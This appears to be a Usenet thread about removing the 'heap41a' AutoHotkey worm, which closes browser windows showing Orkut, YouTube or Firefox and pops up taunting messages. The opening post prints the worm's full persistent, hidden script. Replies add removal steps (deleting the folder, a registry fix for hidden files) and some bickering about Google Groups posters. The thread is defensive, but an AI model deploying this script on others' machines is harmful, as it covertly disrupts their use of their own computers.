How to remove "ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??"
RAVIN
when I came home. MY system was ON , Never Notice that before since i
had given a Command to shut down @ 10:30 in the Morning.. ok.. ok
Lemme tell you how remove tat Bug(here Malware)
when you get that Message.
1. Go to the Task manager
2. click on the "Application" Tab ( if its not )
3. Right Click on the application that's Giving you the Messge > go
the Process.
4 as you can see there is "svchost.exe" Highlighted.
5. Right Click and Select "End Process Tree"
well this is for the Begginers. :)
if you really wanna get rid of the malware.
here is the deal..
there is a File called
"heap41a"
which is located in C:\heap41a.
This is the Script which i got it when i checked the file.
#persistent
#notrayicon
settimer,ban,2000
return
ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA
BUT USE IE `r OR ELSE...,30
return
}
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
}
return
I notice that there are two websites which are been blocked...
1. Orkut
2. youtube
also i notice that there is a .mp3 file which lets the Sound to be
Played @ the end of the Display.
well.. who ever the person written this TCR its good for me since I
got some sound to scare small children :D..
hmmm what are you waiting for Guys, del that Folder C:\heap41a
if want to know more...
mail to ravi...@gmail.com
These days I'm busy since i have Exams running in my Head. :) if
possible I 'll tell you more.
bye..
Dennis McCunney
> hmmm what are you waiting for Guys, del that Folder C:\heap41a
I don't have one to delete. Crap like that doesn't get on to my system
in the first place. You need to look at how it *could* get on to yours.
______
Dennis
--
guru, n: A computer owner who can read the manual.
squaredancer
McCunney to generate the following:? :
> RAVIN wrote:
>
>
>> hmmm what are you waiting for Guys, del that Folder C:\heap41a
>>
>
> I don't have one to delete. Crap like that doesn't get on to my system
> in the first place. You need to look at how it *could* get on to yours.
> ______
> Dennis
>
>
reg
goodwin
yep, another google grouper out of India - seems a few here still take
these nitwits seriously...
MptM...@gmail.com
You are a real perfect gem!
People like you are the ones whom people like me need!
You indeed are a real "Godfather" for solving this, man!
Keep up your good work!
mjj...@gmail.com
can you tell me which script is this..
antrik...@gmail.com
>
> These days I'm busy since i have Exams running in my Head. :) if
> possible I 'll tell you more.
>
> bye..
thnkx a lot dude..
gr8 help!!!!
goodwin
<snip troll tripe>
zoolook - getting a hint yet?
Indian google grouper from a spam infested network this time - kill file
is starting to read like the Ramayana....
john sumner
news:S9GdncDR3eVT89Hb...@mozilla.org:
It si crap like this that makes me me want to kill file gmail, yahoo,and
hotmail posting morons.
goodwin
Know where you're coming from but can't paint them /all/ with the same
brush. The problems with google /groupers/ is that they don't
understand/even know about usenet or its implementation. That said, I'm
in fact leaning toward something else more along the lines of a troll in
the above post - it seems possible that all the posts were written by
the same person, or maybe they all had the same english teacher?
john sumner
> Know where you're coming from but can't paint them /all/ with the same
> brush. The problems with google /groupers/ is that they don't
> understand/even know about usenet or its implementation. That said,
> I'm in fact leaning toward something else more along the lines of a
> troll in the above post - it seems possible that all the posts were
> written by the same person, or maybe they all had the same english
> teacher?
Thanks goodwin i know there are some poeple who use gmail and yahoo
and hotmail and are good people but they are far and few between
and i get a little fustrated with it
Blinky the Shark
> Thanks goodwin i know there are some poeple who use gmail and yahoo and
> hotmail and are good people but they are far and few between and i get a
> little fustrated with it.
Heck, even *I* don't kill (or even downscore) gmail/yahoo/hotmail users,
and I think you know from other newsgroups that I'm pretty hardcore about
Google Gropers. :)
--
Blinky RLU 297263
Killing all posts from Google Groups
The Usenet Improvement Project: http://blinkynet.net/comp/uip5.html
manju...@gmail.com
You did a big thing dude
> mail to ravi.w...@gmail.com
john sumner
> Heck, even *I* don't kill (or even downscore) gmail/yahoo/hotmail users,
> and I think you know from other newsgroups that I'm pretty hardcore about
> Google Gropers. :)
>
>
Hey blinky how are ya, just how many groups are you in<G>
and like i have said if a gmailer,yahoo,and hotmailer
are not trolls i leave them alone
Blinky the Shark
> Blinky the Shark <no....@box.invalid> wrote in
>>
>> Heck, even *I* don't kill (or even downscore) gmail/yahoo/hotmail users,
>> and I think you know from other newsgroups that I'm pretty hardcore
>> about Google Gropers. :)
>>
>>
>>
> Hey blinky how are ya, just how many groups are you in<G>
Enough that I can keep an eye on you. ;)
ravi...@gmail.com
hsb...@gmail.com
Thanks a lot Ravin.
I was almost about to format my system until i found your blog.
The virus writer has also disabled the option of viewing the hidden
files and folders and so i was not able to see this folder c:
\heap41a.
One more important thing to do is to open the registry and set the
option "HKEY_LOCAL_MACHINE->software->microsoft->windows->current
version->explorer->advanced->folder->hidden->showall->CheckedValue" to
1 instead of the 0 which you are seeing. If you do not do this, you
wont be able to see hidden folders.
cip...@gmail.com
>
> These days I'm busy since i have Exams running in my Head. :) if
> possible I 'll tell you more.
>
> bye..
Checkout the orkut, firefor, youtube all in one solution here
http://meninweb.blogspot.com/2007/05/i-dnt-hate-mozilla-but-use-ie-or-else.html
jeyaram...@gmail.com
Hai... One more problem because of that worm....
The hidden files are not displayed....
How to solve that issue..
rav...@gmail.com
>
> These days I'm busy since i have Exams running in my Head. :) if
> possible I 'll tell you more.
>
> bye..
Hi i am ravi here actually ialso got same msg when i going to type
orkut in run command OR address bar OR if iam pinging from system then
i am geting this error. after seeing ur answer i am searching that
folder (C:\heap41a) but i am not geting that folder in my system. if u
know the any other solutions then let me know...
Thanks & Regards
Ravikumar.p
Beast
one can check this site which has got nice images and animations....
http://www.freewebs.com/mgsujith/worm/remove.html
On May 8, 7:06 pm, RAVIN <ravi.w...@gmail.com> wrote:
> mail to ravi.w...@gmail.com
swapy
yaar i m not getting this (heap41a) file in my C drive, even i m not
able to get my other hidden files in other drives too.
is there any solution to this or i have to format my system
thanks and regards.
swapan kumar
Vicks Rocz
Could you please explain your problem more clearly.
Subject line is to give a summary of your post. There is no point in
using it to convey part of the message.
--
Vicks
vino...@gmail.com
easy methods to blocks site please reply soon sir.
Thank you sir.
Vicks Rocz
Could you give some example what you want? which site you want to be
blocked?
I mean, if you are not talking about blocking some profile/ community of
Orkut, you should have posted in a new thread.
--
Vicks
David McRitchie
For Windows and Linux there is the hosts file, but you have to put in a lot
of entries just to block variations of doubleclick.net the advantage
is the it will block sites regardless of browser used or if you turn off
an extension. Good to have.
Blocking Unwanted Parasites with a Hosts File
http://www.mvps.org/winhelp2002/hosts.htm
You want to include all dangerous sites in your hosts file
that you are likely to encounter, and at least some of the
annoying sites you don't want to visit.
But most of my blocking in Firefox is actually acomplished with
"Adblock" extension. You can install "Adblock Plus" extension, see
https://addons.mozilla.org/en-US/firefox/addon/1865
adding entries is easy or you can subscribe to a filter set.
You want to filter out all annoying ads, and dangerous sites
--
David McRitchie, most questions have been asked before.
Firefox customizations/extensions notes, see
http://www.mvps.org/dmcritchie/firefox/firefox.htm
sivar...@gmail.com
Thanks ravi;
I tried to search the file heap41 in C: but could not find even when
asked to show the hidden filed in view menu. But i could successfully
traced using google desktop search, which showed the the file heap41a
is present in C folder. For deleting, I entered in MSdos mode and
erased the folder using
>rd C:\heap41a
which solved the problem (permanently?)
With regards
Sivaramane, N.Delhi
Vicks Rocz
quoting from another thread where it was posted:
http://kb.mozillazine.org/'Use_IE'_messages_upon_opening_Firefox
--
Vicks
nagesh...@gmail.com
The full details of what is caused by this worm is available at the
following URL
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_AHKHEAP.A&VSect=T
There is more than just "heap41a" directory. Also your removable
drives (if you use any) may be infected. Clean them too to ensure it
does not make a return!!
Regds,
Nagesh